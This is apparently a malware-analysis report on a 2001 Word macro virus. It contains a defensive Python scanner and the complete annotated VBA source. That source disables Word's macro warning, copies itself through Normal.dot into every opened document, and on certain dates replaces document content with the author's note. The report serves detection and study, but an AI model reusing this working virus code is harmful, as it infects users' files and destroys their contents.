Malware Insights
The sample is a self-replicating Word macro virus, not a downloader. The recovered VBA project (macros.bas) consists of the document's ThisDocument class module and a standard module internally named "Sr" that defines the auto-executing subroutines AutoNew, AutoOpen and AutoClose, the legacy WordBasic entry points that Word still runs when a document is created, opened or closed. Each entry point first turns off Word's macro warning (Options.VirusProtection = False) and the prompt to save the global template, then calls the 'Stp' subroutine. 'Stp' uses Application.OrganizerCopy with Object:=3 (VBA project items) to copy the "Sr" module from Normal.dot into the active document and from the document back into Normal.dot, and then saves the template, so the infection survives across Word sessions and spreads to every document opened afterwards. AutoClose also carries a date-gated payload: when Word's short date string equals 25.06.01 through 30.06.01 (dd.mm.yy, so it only fires on a locale with that format, in late June 2001) it sets the document password to "agl", saves a protected copy of the original content under <Word install path>\dc\<document name>, removes that copy from the recent-files list, replaces the visible body with a Russian note pointing to treon9875@rambler.ru, then clears the password and writes the replaced body back to the original path. This is a crude data-hostage scheme; because the password is hard-coded, the original content in the dc\ copy is recoverable without contacting the author. The code is not obfuscated and retrieves no secondary payload. ClamAV flags both the document (Doc.Trojan.Sr-1) and the extracted macro source (Win.Trojan.Alicia-3).
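Added example for this report, not part of the analyzer or of the sample: a small Python scanner that applies the indicators described above to VBA source of the kind olevba writes to macros.bas. It joins VBA line continuations so the multi-line OrganizerCopy call is matched as one statement, flags auto-exec entry points, template replication, VirusProtection tampering, the date comparison and the password assignment, recovers the dd.mm.yy trigger dates, and rolls the findings into a verdict. The indicator names, severities and verdict strings are this example's own choices; the embedded input is a condensed copy of the "Sr" module shown in the preview, constructed for the run, and the century for the two-digit years is assumed to be 20xx.

```python
"""Indicator scanner for VBA source extracted with olevba (e.g. macros.bas).

Added example for this report; not part of the analysis tooling or the sample.
"""
import re
from datetime import date

# Constructed input: a condensed copy of the "Sr" module shown in the preview,
# keeping only the statements the scanner cares about.
SAMPLE_VBA = """\
Sub Stp()
On Error Resume Next
zz = Word.ActiveDocument.FullName
ee = Normal.ThisDocument.FullName
Application.OrganizerCopy Source:=ee, _
Destination:=zz, Name:="Sr", _
Object:=3
Application.OrganizerCopy Source:=zz, _
Destination:=ee, Name:="Sr", _
Object:=3
Word.NormalTemplate.Save
End Sub
Sub AutoOpen()
Word.Options.VirusProtection = False
Options.SaveNormalPrompt = False
Stp
End Sub
Sub AutoClose()
Word.Options.VirusProtection = False
Stp
qq = DateTime.Date
If qq = "25.06.01" Or qq = "26.06.01" Or qq = "30.06.01" Then
Application.ActiveDocument.Password = "agl"
End If
End Sub
"""

AUTOEXEC_NAMES = r"AutoOpen|AutoClose|AutoNew|AutoExec|AutoExit|Document_Open|Document_Close"

# Indicator name -> (pattern, severity). Names and severities are this
# example's own choices, not a vendor taxonomy.
INDICATORS = {
    "autoexec_sub": (re.compile(rf"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:{AUTOEXEC_NAMES})\b", re.I), "high"),
    # Object:=3 is wdOrganizerObjectProjectItems: a VBA module is being copied.
    "organizer_copy": (re.compile(r"\bOrganizerCopy\b.*\bObject:=3\b", re.I), "high"),
    "normal_template_save": (re.compile(r"\bNormalTemplate\.Save\b", re.I), "high"),
    "virus_protection_off": (re.compile(r"\bVirusProtection\s*=\s*False\b", re.I), "high"),
    "save_normal_prompt_off": (re.compile(r"\bSaveNormalPrompt\s*=\s*False\b", re.I), "medium"),
    "doc_password_set": (re.compile(r'\.Password\s*=\s*"[^"]+"', re.I), "medium"),
    "date_comparison": (re.compile(r"\bDateTime\.Date\b", re.I), "low"),
    "on_error_resume_next": (re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I), "low"),
}

DATE_LITERAL = re.compile(r'"(\d{2})\.(\d{2})\.(\d{2})"')


def logical_lines(src):
    """Join VBA line continuations (trailing ' _') so that a statement split
    across lines, such as the OrganizerCopy call, is matched as one line."""
    return re.sub(r"[ \t]+_\r?\n[ \t]*", " ", src).splitlines()


def scan_vba(src):
    """Return (indicator, severity, logical_line_no, matched_text) tuples."""
    findings = []
    for no, line in enumerate(logical_lines(src), start=1):
        for name, (rx, sev) in INDICATORS.items():
            m = rx.search(line)
            if m:
                findings.append((name, sev, no, m.group(0).strip()))
    return findings


def trigger_dates(src):
    """Recover dd.mm.yy literals used in If-comparisons as ISO dates.
    Assumption: the two-digit year is 20xx, matching the sample's 2001 window."""
    out = []
    for line in logical_lines(src):
        if re.match(r"\s*If\b", line, re.I):
            for d, m, y in DATE_LITERAL.findall(line):
                out.append(date(2000 + int(y), int(m), int(d)).isoformat())
    return out


def verdict(findings):
    """Collapse findings into a one-line classification."""
    names = {f[0] for f in findings}
    if {"autoexec_sub", "organizer_copy", "normal_template_save"} <= names:
        return "macro virus: self-replicating via the Normal template"
    if "autoexec_sub" in names:
        return "auto-executing macro: review manually"
    return "no auto-exec indicators"


if __name__ == "__main__":
    results = scan_vba(SAMPLE_VBA)
    for name, sev, no, text in results:
        print(f"{sev:6} line {no:3}  {name:24} {text}")
    print("trigger dates:", trigger_dates(SAMPLE_VBA))
    print("verdict:", verdict(results))
```

Run it against a real macros.bas by reading the file into scan_vba; the replication verdict requires all three of an auto-exec entry point, an OrganizerCopy of project items and a save of the Normal template, which keeps a lone AutoOpen that only shows a message box out of the macro-virus bucket.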
Heuristics (5)

- ClamAV: Doc.Trojan.Sr-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Sr-1
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Auto_Close macro [high, OLE_VBA_AUTOCLOSE]: Auto_Close macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3149 bytes |

SHA-256: f4802810927660d48a2f931e4708bac2674cf710411a166ffb8a7e59d037a0f7
Detection (ClamAV): Win.Trojan.Alicia-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
' Two modules were recovered by olevba and concatenated into macros.bas:
' the document's own class module (ThisDocument, derived from Normal) and
' the infectious standard module, internally named "Sr".
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' ModuleName = "Sr"

' Replication routine: copies the "Sr" module between the global template
' (Normal.dot) and the active document in both directions, then saves the
' template so the infection persists across Word sessions.
Sub Stp()
On Error Resume Next
zz = Word.ActiveDocument.FullName
ee = Normal.ThisDocument.FullName
' Object:=3 is wdOrganizerObjectProjectItems, i.e. VBA project modules.
Application.OrganizerCopy Source:=ee, _
Destination:=zz, Name:="Sr", _
Object:=3
Application.OrganizerCopy Source:=zz, _
Destination:=ee, Name:="Sr", _
Object:=3
Word.NormalTemplate.Save
End Sub

' Runs when a new document is created from the infected template.
Sub AutoNew()
Word.Options.VirusProtection = False   ' turn off Word's macro warning
ActiveDocument.Saved = False           ' mark the document dirty so it gets saved
Options.SaveNormalPrompt = False       ' save Normal.dot without asking
Options.ConfirmConversions = False
Application.Caption = "T" + ""
End Sub

' Runs when any document is opened: same warning bypass, then infect.
Sub AutoOpen()
Word.Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ActiveDocument.Saved = False
Application.Caption = "T" + ""
Stp
End Sub

' Runs when a document is closed: infect, then run the date-gated payload.
Sub AutoClose()
Word.Options.VirusProtection = False
Application.Caption = "TMicrosoft Word"
Stp
df = Word.ActiveDocument.FullName
qq = DateTime.Date                     ' short-date string, locale dependent
Drr = Word.Application.Path + "\" + "dc"
If (Dir(Drr, vbDirectory) = "") Then MkDir (Drr)
Pat = Word.Application.Path + "\" + "dc" + "\" + ActiveDocument.Name
' Trigger window: 25 to 30 June 2001, compared as dd.mm.yy strings.
If qq = "25.06.01" Or qq = "26.06.01" Or qq = "27.06.01" Or qq = "28.06.01" Or qq = "29.06.01" Or qq = "30.06.01" Then
Application.ActiveDocument.Password = "agl"   ' hard-coded document password
ActiveDocument.Saved = False
' First run only (body not yet replaced): save a password-protected copy of
' the original content under <Word path>\dc\ and drop it from the MRU list.
If ActiveDocument.Content.Find.Execute(FindText:="Hi.") = False Then
ActiveDocument.SaveAs (Pat)
Word.RecentFiles.Item(1).Delete
End If
' Replace the visible document body with the author's note.
ActiveDocument.Select
Selection.Delete
Selection.TypeText ("Hi.")
Selection.TypeParagraph
' Translation: "This virus is my first virus; I am still only learning.
' The answer to the question of how to recover your data you can, for
' now, still get by writing to me."
Selection.TypeText ("Данный вирус, это мой первий вирус, пока я тольку учусь, ответ на вопрос: как востановить свои данные вы, пока еще, сможете получить написав мне.")
Selection.TypeParagraph
' Translation: " My address is treon9875@rambler.ru . See you! Anyone who
' needs a custom-made virus, write to me, always glad to help"
Selection.TypeText (" Мой адрес treon9875@rambler.ru . До встречи! Кому нужен специализированный вирус пишите, всегда рад помочь")
Selection.TypeParagraph
Word.ActiveWindow.WindowState = wdWindowStateNormal
Word.ActiveWindow.Width = 10           ' shrink the window to near invisible
End If
' Clear the password again and write the (now replaced) body back to the
' original path; the copy under dc\ keeps the original content and "agl".
Application.ActiveDocument.Password = ""
ActiveDocument.Saved = False
If Word.ActiveDocument.Path = "" Then
ActiveDocument.Saved = True
ActiveDocument.Saved = False
Else: ActiveDocument.SaveAs (df)
End If
Application.Caption = ""
End Sub

' Dead code: an unfinished password gate for viewing the VBA source.
' Translations: "This feature is blocked"; "семья" = "family";
' "Password is incorrect"; "password entered".
'Sub viewvbcode()
'MsgBox ("Эта возможность заблокирована")
'uf.Show
'If a <> "семья" Then MsgBox ("Пароль не верен") Else Word.WordBasic.AppActivate ("пароль введен")
'End Sub
```